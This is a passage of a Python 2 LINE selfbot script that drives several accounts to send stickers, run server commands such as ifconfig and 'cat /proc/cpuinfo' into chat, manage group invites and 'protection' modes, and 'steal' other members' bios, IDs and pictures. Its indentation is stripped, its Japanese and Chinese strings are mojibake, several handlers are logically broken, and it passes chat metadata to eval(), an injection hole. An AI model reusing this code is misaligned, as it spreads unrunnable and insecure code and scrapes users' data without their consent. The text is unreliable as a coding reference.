cl.sendText(msg.to,Smid)
elif "Luffy" == msg.text:
if msg.from_ in admin:
ki.sendText(msg.to,mid)
elif "Zorro" == msg.text:
if msg.from_ in admin:
kk.sendText(msg.to,Amid)
elif "Sanji" == msg.text:
if msg.from_ in admin:
kc.sendText(msg.to,Bmid)
#--------------------------------- GIFT -------------------------------------
elif msg.text.lower() in ["gift","Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '40ed630f-22d2-4ddd-8999-d64cef5e6c7d',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
#----------------------------------------------------------------------------
elif msg.text in ["Wkwkwk","Wkwk","Wk","wkwkwk","wkwk","wk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hehehe","Hehe","He","hehehe","hehe","he"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Galau"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["You"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hadeuh"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Please"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Haaa"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hmmm","Hmm","Hm","hmmm","hmm","hm"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Welcome"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["TL: "]:
if msg.from_ in admin:
tl_text = msg.text.replace("TL: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["Invite:on"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Bot1 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot2 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv1 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = ki.getProfile()
profile_B.displayName = string
ki.updateProfile(profile_B)
ki.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot3 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv2 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = kk.getProfile()
profile_B.displayName = string
kk.updateProfile(profile_B)
kk.sendText(msg.to,"name " + string + " done")
#==================================
#==================================================
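        # lyric <song>: queries a third-party lyric API (the ide.fdlrcn.com joox endpoint)
        # and sends back the title and lyric text.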
elif 'lyric ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('lyric ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif 'wiki ' in msg.text.lower():
if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text.lower() == 'dul restart':
if msg.from_ in admin:
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif msg.text.lower() == 'ifconfig':
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif 'instagram ' in msg.text.lower():
if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
details = "\n======INSTAGRAM INFO USER======"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
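        # music <song>: same joox endpoint as "lyric", but sends the track info and then
        # the audio file by URL.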
elif 'music ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('music ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[3])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'clean invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting。")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#================================================================================
elif 'clear invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif 'link open' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================================================
elif 'link close' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#============================================================
elif msg.text.lower() == 'ginfo':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[display name]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nmembers:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
#===============================================================
elif 'group list' in msg.text.lower():
if msg.from_ in admin:
gs = cl.getGroupIdsJoined()
L = "『 Groups List 』\n"
for i in gs:
L += "[≫] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif "Invite me" in msg.text:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(i,[msg.from_])
cl.sendText(msg.to, "successfully invited you to all groups")
elif "Steal group pict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Turn off bots" in msg.text:
if msg.from_ in admin:
try:
import sys
sys.exit()
except:
pass
#==================================================================
elif "Steal bio" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,contact.statusMessage)
#===========================================================
#=======================================================
elif "T-eng " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-eng ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'en')
cl.sendText(msg.to,trs)
print '[Command] Translate EN'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-japan " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-japan ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'ja')
cl.sendText(msg.to,trs)
print '[Command] Translate japan'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-thai " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-thai ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'th')
cl.sendText(msg.to,trs)
print '[Command] Translate thai'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-id " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-id ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'id')
cl.sendText(msg.to,trs)
print '[Command] Translate ID'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Say " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Say ","")
cl.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
#==========================================================================
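        # Mode on: one command that deliberately fires several blocks in a row: it closes
        # the QR link, rejects pending group invites, and switches the protection flags
        # (Protectgr, Protectcancl, Protectjoin, protectionOn, qr, name guard, invite guard) on.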
elif msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Boss")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
if "Mode on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pname'][msg.to] = cl.getGroup(msg.to).name
if "Mode on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
#==========================================================================
elif msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if "Mode off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
if "Mode off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#==========================================================================
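# NOTE: The "Mode on"/"Mode off" chains above repeat the same pattern for every
# protection flag in `wait` (Protectgr, Protectcancl, Protectjoin, protectionOn, qr).
# A minimal sketch of a shared toggle helper (module level, hypothetical name) that
# those handlers could reuse:
#
#     def set_flag(name, value, reply_changed, reply_already):
#         if wait.get(name) == value:
#             return reply_already
#         wait[name] = value
#         return reply_changed
#
# e.g. cl.sendText(msg.to, set_flag("Protectgr", True, "Protect QR On", "done"))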
#======================================
elif msg.text in ["Protect:hight","protect:hight"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:off","auto blockqr:off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:on","auto blockqr:on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Protect:low","Protect:low"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Namelock:on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
elif "Blockinvite:on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
elif "Blockinvite:off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#================================================================
elif msg.text in ["Undang"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
#============================================================
elif "Steal mid" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Steal contact" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)#=================
elif msg.text in ["Mc "]:
if msg.from_ in admin:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text in ["Joinn on","joinn on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Joinn off","joinn off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel on","cancel on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr on","qr on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr off","qr off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact On","Contact on","contact on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact Off","Contact off","contact off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オン","Join on","Auto join on","自動å�ƒåŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オフ","Join off","Auto join off","自動å�ƒåŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gcancel:"]:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒�。�时开请指定人数��")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的å°�组ç���¨è‡ªåŠ¨é‚€è¯·æ���’ç»�")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["強制自動退出:オン","Leave on","Auto leave:on","強制自動退出:開"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["強制自動退出:オフ","Leave off","Auto leave:off","強制自��‹•退出ï¼��é—œ"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["共有:オン","Share on","Share on"]:
if msg.from_ in admin:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["å���±æœ‰:オフ","Share off","Share off"]:
if msg.from_ in admin:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Status","Set"]:
if msg.from_ in admin:
md = "⭐Status Protection*============*\n"
if wait["Protectgr"] == True: md+="[•]Protect QR [On]\n"
else: md+="[•]Protect QR [Off]\n"
if wait["Protectcancl"] == True: md+="[•]Protect Invite [On]\n"
else: md+="[•]Protect Invite [Off]\n"
